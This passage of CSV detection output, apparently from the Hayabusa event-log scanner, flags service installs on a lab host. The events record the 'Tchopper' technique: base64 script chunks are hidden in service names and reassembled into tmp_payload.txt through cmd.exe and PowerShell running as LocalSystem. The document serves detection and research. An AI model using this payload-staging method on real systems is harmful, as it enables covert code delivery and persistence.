-Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:32.440 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBzY2FuIHRoZSBFdmVudCBMb2cocykgJiBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIChFUFMpLg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg13"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:32.440 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBzY2FuIHRoZSBFdmVudCBMb2cocykgJiBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIChFUFMpLg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg13"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:33.911 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0KIw0KI0BwYXJhbSAkQWdlbnQgICAgICAgICAgLT4gIFRoZSBDb21wdXRlciAvIElQDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAtPiAgVGhlIEV2ZW50IExvZyB0aGF0IHdpbGwgYmUgZXZhbHVh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg14"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:33.911 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 0KIw0KI0BwYXJhbSAkQWdlbnQgICAgICAgICAgLT4gIFRoZSBDb21wdXRlciAvIElQDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAtPiAgVGhlIEV2ZW50IExvZyB0aGF0IHdpbGwgYmUgZXZhbHVh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg14"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:33.911 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0KIw0KI0BwYXJhbSAkQWdlbnQgICAgICAgICAgLT4gIFRoZSBDb21wdXRlciAvIElQDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAtPiAgVGhlIEV2ZW50IExvZyB0aGF0IHdpbGwgYmUgZXZhbHVh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg14"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:35.365 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dGVkIChTZWN1cml0eSwgQXBwbGljYXRpb24sIFN5c3RlbSkNCiNAcGFyYW0gJFJlbW90ZUNvbXB1dGVyIC0+ICBUaGUgdmFsdWUgdG8gdGVsbCBpZiB0aGUgY29tcHV0ZXIgaXMgcmVtb3RlIG9yIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg15"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:35.365 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: dGVkIChTZWN1cml0eSwgQXBwbGljYXRpb24sIFN5c3RlbSkNCiNAcGFyYW0gJFJlbW90ZUNvbXB1dGVyIC0+ICBUaGUgdmFsdWUgdG8gdGVsbCBpZiB0aGUgY29tcHV0ZXIgaXMgcmVtb3RlIG9yIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg15"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:35.365 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dGVkIChTZWN1cml0eSwgQXBwbGljYXRpb24sIFN5c3RlbSkNCiNAcGFyYW0gJFJlbW90ZUNvbXB1dGVyIC0+ICBUaGUgdmFsdWUgdG8gdGVsbCBpZiB0aGUgY29tcHV0ZXIgaXMgcmVtb3RlIG9yIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg15"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:36.820 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: xvY2FsICANCiMNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg16"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:36.820 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: xvY2FsICANCiMNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg16"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:36.820 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: xvY2FsICANCiMNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg16"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:38.273 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZnVuY3Rpb24gR2V0LUV2ZW50TG9nSW5mbyB7IHBhcmFtKCRBZ2VudCwgJExvZ05hbWUsICRSZW1vdGVDb21wdXRlciwgJE9TKQ0KDQogICAgJExvZ0luZm8gPSBAe30gICAgICAgIA0KDQogICAgIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg17"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:38.273 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZnVuY3Rpb24gR2V0LUV2ZW50TG9nSW5mbyB7IHBhcmFtKCRBZ2VudCwgJExvZ05hbWUsICRSZW1vdGVDb21wdXRlciwgJE9TKQ0KDQogICAgJExvZ0luZm8gPSBAe30gICAgICAgIA0KDQogICAgIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg17"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:38.273 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZnVuY3Rpb24gR2V0LUV2ZW50TG9nSW5mbyB7IHBhcmFtKCRBZ2VudCwgJExvZ05hbWUsICRSZW1vdGVDb21wdXRlciwgJE9TKQ0KDQogICAgJExvZ0luZm8gPSBAe30gICAgICAgIA0KDQogICAgIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg17"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:39.711 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RyeSB7ICAgICANCiAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICMgSnVzdCBsb2NhbGhvc3QNCiAgICAgICAgSWYgKCEkUmVtb3RlQ29tcHV0ZXIpIHsgICAgICAgICANCg0KICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg18"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:39.711 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RyeSB7ICAgICANCiAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICMgSnVzdCBsb2NhbGhvc3QNCiAgICAgICAgSWYgKCEkUmVtb3RlQ29tcHV0ZXIpIHsgICAgICAgICANCg0KICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg18"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:39.711 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RyeSB7ICAgICANCiAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICMgSnVzdCBsb2NhbGhvc3QNCiAgICAgICAgSWYgKCEkUmVtb3RlQ29tcHV0ZXIpIHsgICAgICAgICANCg0KICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg18"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:41.177 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgJFRvdGFsTG9nRXZlbnRzID0gKEdldC1XaW5FdmVudCAtTGlzdExvZyAkTG9nTmFtZSkuUmVjb3JkQ291bnQNCg0KICAgICAgICAgICAgJExvZ1NpemUgPSAoR2V0LVdpbkV2ZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg19"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:41.177 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICAgICAgJFRvdGFsTG9nRXZlbnRzID0gKEdldC1XaW5FdmVudCAtTGlzdExvZyAkTG9nTmFtZSkuUmVjb3JkQ291bnQNCg0KICAgICAgICAgICAgJExvZ1NpemUgPSAoR2V0LVdpbkV2ZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg19"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:41.177 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgJFRvdGFsTG9nRXZlbnRzID0gKEdldC1XaW5FdmVudCAtTGlzdExvZyAkTG9nTmFtZSkuUmVjb3JkQ291bnQNCg0KICAgICAgICAgICAgJExvZ1NpemUgPSAoR2V0LVdpbkV2ZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg19"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:42.631 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 1MaXN0TG9nICRMb2dOYW1lKS5GaWxlU2l6ZSAvIDEwMDAwMDAgIyBTZXQgdG8gTUINCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1NpemUgPSBbbWF0aF06OlJvdW5kKCgkTG9nU2l6ZSks | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg20"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:42.631 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 1MaXN0TG9nICRMb2dOYW1lKS5GaWxlU2l6ZSAvIDEwMDAwMDAgIyBTZXQgdG8gTUINCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1NpemUgPSBbbWF0aF06OlJvdW5kKCgkTG9nU2l6ZSks | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg20"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:42.631 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 1MaXN0TG9nICRMb2dOYW1lKS5GaWxlU2l6ZSAvIDEwMDAwMDAgIyBTZXQgdG8gTUINCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1NpemUgPSBbbWF0aF06OlJvdW5kKCgkTG9nU2l6ZSks | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg20"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:44.099 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IDEpDQogICAgIA0KICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLU9sZGVzdCAtbWF4ZXZlbnRzIDEpLlRpbWVDcmVhdGVkICAgICAgICANCg0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg21"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:44.099 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IDEpDQogICAgIA0KICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLU9sZGVzdCAtbWF4ZXZlbnRzIDEpLlRpbWVDcmVhdGVkICAgICAgICANCg0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg21"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:44.099 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IDEpDQogICAgIA0KICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLU9sZGVzdCAtbWF4ZXZlbnRzIDEpLlRpbWVDcmVhdGVkICAgICAgICANCg0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg21"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:45.554 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgJE5ld2VzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLW1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICANCiAgICAgICAgICAgICRUb3RhbFRpbWUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg22"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:45.554 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAgICAgJE5ld2VzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLW1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICANCiAgICAgICAgICAgICRUb3RhbFRpbWUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg22"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:45.554 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgJE5ld2VzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLW1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICANCiAgICAgICAgICAgICRUb3RhbFRpbWUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg22"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:47.028 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: PSAoR2V0LURhdGUpLlN1YnRyYWN0KCRPbGRlc3RFdmVudFRpbWUpLlRvdGFsU2Vjb25kcw0KDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gJFRvdGFsTG9nRXZlbnRzIC8gJFRvdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg23"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:47.028 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: PSAoR2V0LURhdGUpLlN1YnRyYWN0KCRPbGRlc3RFdmVudFRpbWUpLlRvdGFsU2Vjb25kcw0KDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gJFRvdGFsTG9nRXZlbnRzIC8gJFRvdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg23"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:47.028 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: PSAoR2V0LURhdGUpLlN1YnRyYWN0KCRPbGRlc3RFdmVudFRpbWUpLlRvdGFsU2Vjb25kcw0KDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gJFRvdGFsTG9nRXZlbnRzIC8gJFRvdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg23"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:48.498 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: FsVGltZSAgICAgICANCiAgICAgICAgDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gW21hdGhdOjpSb3VuZCgkQXZnRXZlbnRzUGVyU2Vjb25kLCA1KSANCiAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg24"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:48.498 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: FsVGltZSAgICAgICANCiAgICAgICAgDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gW21hdGhdOjpSb3VuZCgkQXZnRXZlbnRzUGVyU2Vjb25kLCA1KSANCiAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg24"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:48.498 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: FsVGltZSAgICAgICANCiAgICAgICAgDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gW21hdGhdOjpSb3VuZCgkQXZnRXZlbnRzUGVyU2Vjb25kLCA1KSANCiAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg24"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:49.956 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgICMgUmVtb3RlIGJveA0KICAgICAgICBFbHNlIHsNCg0KICAgICAgICAgICAgaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg25"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:49.956 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgICMgUmVtb3RlIGJveA0KICAgICAgICBFbHNlIHsNCg0KICAgICAgICAgICAgaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg25"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:49.956 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgICMgUmVtb3RlIGJveA0KICAgICAgICBFbHNlIHsNCg0KICAgICAgICAgICAgaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg25"" | 